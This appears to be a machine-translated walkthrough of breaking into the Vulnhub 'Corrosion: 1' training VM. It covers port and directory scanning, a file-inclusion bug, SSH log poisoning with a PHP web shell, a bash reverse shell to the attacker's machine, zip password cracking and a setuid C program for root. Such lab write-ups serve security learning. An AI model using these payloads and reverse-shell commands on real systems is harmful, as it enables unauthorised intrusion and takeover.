Vulnhub target machine Corrosion: 1 penetration test detailed explanation
Vulnhub target drone introduction:
Vulnhub is a comprehensive shooting range that provides a variety of vulnerability platforms. It can be downloaded from a variety of virtual machines, and the local VM can be opened. It is like playing a game to complete interesting combats such as penetration testing, privilege escalation, vulnerability exploitation, and code auditing.
This is a vulnerability target drone, just need to find the flag as usual.
Difficulty: Easy
Vulnhub target machine download:
Official website download: https://download.vulnhub.com/corrosion/Corrosion.ova
Vulnhub target machine installation:
After downloading, unzip the installation package and use it VMware
to open it.
Detailed Explanation of Vulnhub Target Machine Vulnerabilities:
①: Information collection:
kali
use arp-scan -l
or netdiscover
discover hosts
Use the command:
nmap -sS -sV -T4 -n -p- 192.168.0.103
Penetration machine: kali IP: 192.168.0.104 Target machine IP: 192.168.0.103
80
It is found that the port and the port are opened 22
, and the access 80
port ( Apache
default page) is scanned in the same way: dirb、dirsearch、whatweb、gobuster
etc.
Here we scan to a /tasks
directory to access and prompt us: Then use it dirsearch
or gobuster
scan to it /blog-post
and then access
- Changing permissions for authorization logs
- change port
22 -> 7672
- set up
phpMyAdmin
gobuster dir -u http://192.168.0.103/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
whatweb 192.168.0.103
dirsearch -u http://192.168.0.103 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
②: Vulnerability discovery:
Found that there is no usable information, continue to collect information and try to scan the secondary directory and scan gobuster
to one /archives
for access
gobuster dir -u http://192.168.0.103/blog-post/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip
There is nothing here, but it feels a bit like the file contains the source code and nothing is blank. Fuzzy ffuf
detection to get the parameters file
and then file inclusion
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.0.103/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0
③: The file contains penetration (ssh log writing Trojan horse):
ssh '<?php system($_REQUEST['cmd']);?>'@192.168.0.103
view-source:http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ifconfig #查看发现执行成功!
④: Rebound Shell:
nc -lvvp 4444
echo "bash -i >& /dev/tcp/192.168.0.104/4444 0>&1" | bash #需要url编码
http://192.168.0.103/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.0.104/4444%200%3E%261%22%20%7C%20bash #这里需要url编码
⑤: GCC compiled file rights escalation:
Get it shell
, first look at the permissions and find that it is a low permission, www-data
so you need to escalate the permissions
sudo -l
Check to see if there are any executable sudo
files or hidden filesrandylogs.php
/var
A file was found in the directory again backups
, it may be a backup file
If you want to access the files in the target machine, you need to python
open a temporary web service: python3 -m http.server 8000
download user_backup.zip
discovery requires a password
Use here zip2john user_backup.zip > passwd.txt
Import the password file into passwd
the file and use it john
to crack Here use a dictionary
If you do not add a dictionary, you will report an error when you end the process. Here comes a /root/.john/john.rec
similar process. Just delete it if you repeat it. Use rm -rf /root/.john/john.rec
the command
rockyou
You can use this dictionary to blast using the dictionary , and you can also use fcrackzip
the blast to get the password:!randybaby
Here we know the account password and try to log in randy
and find that the login is successful! ! !
Collect basic informationid,whoami,sudo -l
Here sudo -l
, I found that /tools/easysysinfo
the command can be executed without secrets, cat
run it for a while, and then there is a c
file on which
it to check if there is anygcc
If there is, you can compile and create a new eastsysinfo.c
content to see the code block, and then gcc
compile sudo
and run the compiled file.
#include "unistd.h"
#include "stdlib.h"
void main()
{
setuid(0);
setgid(0);
system("bash -i");
}
⑥: Get FLAG:
So far, the flag has been obtained, and the penetration of this article is over. Thank you for watching! !
Vulnhub target penetration summary:
The difficulty of this target machine is above the middle level because it is more troublesome
1. Information collection arp-scan -l
Obtain ip address and port information web
Scanning tool: nikto,dirb,dirbuster,whatweb,ffuf
wait to view F12
the source code information
2. The file contains vulnerabilities, including log files ssh
Write to the Trojan ssh '<?php system($_REQUEST['cmd']);?>'@
target machine (new knowledge point!)
3. nc
Rebound shell
(Encoding should be used here url
) zip2john
blasting and fcrackzip
(blasting compression package tool) and john
error reporting solutions (new knowledge points!)
4. python3 -m http.server 8000
Turn on temporary http
services
5. gcc
Compile file privilege upgrade which
Check if there are any useful commands in the system for privilege escalation
Corrosion
The first target drone in the series, I learned a lot of knowledge points and it was a very fruitful day (Yay yeah!) The
final creation is not easy, I hope it will be helpful to everyone, if you like it, please give me a one-click triple link Happiness is my greatest happiness! !